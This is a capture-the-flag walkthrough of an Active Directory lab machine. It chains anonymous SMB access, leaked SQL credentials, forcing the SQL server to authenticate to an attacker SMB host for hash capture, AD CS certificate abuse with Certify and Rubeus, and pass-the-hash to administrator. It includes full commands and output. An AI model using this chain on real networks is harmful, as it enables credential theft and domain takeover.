This is a Windows Machine which is part of an Active Directory. I would try my best to explain the stuff that I did, since that I’ve seen pretty bad write-ups that are not explaining anything. I also want to be honest, and I will link every write-up that I used to exploit the machine.
I am still learning Active Directory at the time of writing this, so there might be errors, I will do my best to mitigate that!
I started with a simple
$ nmap -Pn 10.10.11.202 PORT STATE SERVICE 53/tcp open domain 88/tcp open kerberos-sec 135/tcp open msrpc 139/tcp open netbios-ssn 389/tcp open ldap 445/tcp open microsoft-ds 464/tcp open kpasswd5 593/tcp open http-rpc-epmap 636/tcp open ldapssl 1433/tcp open ms-sql-s 3268/tcp open globalcatLDAP 3269/tcp open globalcatLDAPssl
Now since I am new to Active Directory I turned to https://book.hacktricks.xyz/network-services-pentesting/pentesting-smb to check what I can try.
Eventually, after trying most of them, I landed on
$ smbclient --no-pass -L 10.10.11.202 Sharename Type Comment --------- ---- ------- ADMIN$ Disk Remote Admin C$ Disk Default share IPC$ IPC Remote IPC NETLOGON Disk Logon server share Public Disk SYSVOL Disk Logon server share
This is a list of shared folders, the one that we can take a look at is
$ smbclient -N //10.10.11.202/Public Try "help" to get a list of possible commands. smb: \> ls . D 0 Sat Nov 19 06:51:25 2022 .. D 0 Sat Nov 19 06:51:25 2022 SQL Server Procedures.pdf A 49551 Fri Nov 18 08:39:43 2022 5184255 blocks of size 4096. 1276406 blocks available smb: \> get "SQL Server Procedures.pdf" getting file \SQL Server Procedures.pdf of size 49551 as SQL Server Procedures.pdf (62.8 KiloBytes/sec) (average 62.8 KiloBytes/sec)
Opening, the PDF states that we can use
PublicUser:GuestUserCantWrite1 to log in to the SQL Server. We can use the
impacket-mssqlclient which is a tool
$ impacket-mssqlclient WORKGROUP/PublicUser:GuestUserCantWrite1@10.10.11.202
Once I was in I started enumerating the database, looking at this and that, but I had no luck, I turned to some write-ups to follow up.
Now most of the write-ups are just skipping the explanation of this step, but I think that it is really important to know what’s going on, so I will do my best to explain it.
Following up this https://book.hacktricks.xyz/network-services-pentesting/pentesting-mssql-microsoft-sql-server#steal-netntlm-hash-relay-attack attack, I tried the following thing:
I checked if I can execute
SQL> EXEC sp_helprotect 'xp_dirtree'; Owner Object Grantee Grantor ProtectType Action Column ------ -------------------- ------------ ------- ----------- -------------- ------ sys xp_dirtree public dbo b'Grant ' Execute .
It turns out I can, so to capture the authentication hash, I need to set up an SMB server:
# My Machine $ impacket-smbserver -smb2support smb ./smb
And then to execute the
xp_dirtree on the SQL Server
SQL> exec master.dbo.xp_dirtree '\\<myIP>\smb'
Doing this would catch the
AUTHENTICATE_MESSAGE, the user and the hash.
$ impacket-smbserver -smb2support smb ./smb Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation [*] Config file parsed [*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0 [*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0 [*] Config file parsed [*] Config file parsed [*] Config file parsed [*] Incoming connection (10.10.11.202,52180) [*] AUTHENTICATE_MESSAGE (sequel\sql_svc,DC) [*] User DC\sql_svc authenticated successfully [*] sql_svc::sequel:aaaaaaaaaaaaaaaa:84e0a29415d2823f80593c9bc45d158c:010100000000000080fba2b8945ed9010f6267444f7024440000000001001000780056007a005000590061005000570003001000780056007a0050005900610050005700020010006c004f0054006f006f00540076007700040010006c004f0054006f006f005400760077000700080080fba2b8945ed90106000400020000000800300030000000000000000000000000300000c57e7de4e6e8e7baebb297a4bfc1a9019bc96f8f58ffbd9cb233cec428ece87f0a001000000000000000000000000000000000000900220063006900660073002f00310030002e00310030002e00310034002e003100340032000000000000000000
Now I need to crack the hash, I won’t post the results here, so you have to figure that one on your own, it is simple enough! :)
Using the cracked password, I can log in using the
$ evil-winrm --ip 10.10.11.202 --user sql_svc --password $(cat ./password)
Now, we need to start enumerating again. I used winPEAS
*Evil-WinRM* PS C:\Users\sql_svc\Documents> upload /home/syl/tools/win/winPEASany.exe
I eventually stumbled across interesting files and I’ve enumerated the users. The interesting file was
C:\SQLServer\Logs\ERRORLOG.BAK and upon further inspection I’ve got the password for the user
$ evil-winrm --ip 10.10.11.202 --user Ryan.Cooper --password $(cat ./password ryan_password) ... *Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents> gc ../Desktop/user.txt <user_hash>
Now I needed to escalate, I’ve used this guide for misconfigured certificates that cause AD CS Domain Escalation. https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation
I’ve uploaded Certify to the SQL Server (user login) and tried to find vulnerable certificates.
NOTE: Certify is a tool to enumerate and abuse misconfigured AD CS, you can find its source code here: https://github.com/GhostPack/Certify. Unfortunately(or fortunately) there aren’t any prebuilt binaries and you have to build it yourself. It is well explained in the README.
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents> ./Certify.exe find /vulnerable ... [!] Vulnerable Certificates Templates : CA Name : dc.sequel.htb\sequel-DC-CA Template Name : UserAuthentication Schema Version : 2 Validity Period : 10 years Renewal Period : 6 weeks msPKI-Certificate-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS Authorized Signatures Required : 0
With that tool, I found a vulnerable certificate that I can use to impersonate an administrator. Following up the attack on hacktricks:
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents> .\Certify.exe request /ca:dc.sequel.htb\sequel-DC-CA /template:UserAuthentication /altname:administrator ... CERTIFICATE ... [*] Convert with: openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
I’ve downloaded the certificate on my machine and ran the command to convert it to
pfx and I’ve uploaded it back to the server.
Using another tool called Rubeus that I’ve used to send raw request for a TGT towards the DC.
$ ./Rubeus.exe asktgt /user:administrator /certificate:cert.pfx /getcredentials /password:123 [*] Action: Ask TGT [*] Using PKINIT with etype rc4_hmac and subject: CN=Ryan.Cooper, CN=Users, DC=sequel, DC=htb [*] Building AS-REQ (w/ PKINIT preauth) for: 'sequel.htb\administrator' [*] Using domain controller: fe80::5438:a078:e66d:b560%4:88 [+] TGT request successful! [*] base64(ticket.kirbi): ... [*] Getting credentials using U2U CredentialInfo : Version : 0 EncryptionType : rc4_hmac CredentialData : CredentialCount : 1 NTLM : <NTLM HASH>
Now, that gave me the NTLM Hash, which is the cryptographic format in which user passwords are stored on Windows systems.
I can use that with:
$ evil-winrm -H "<NTLM HASH>" -u "administrator" -i 10.10.11.202 M* PS C:\Users\Administrator\Documents> gc ../Desktop/root.txt <root_hash>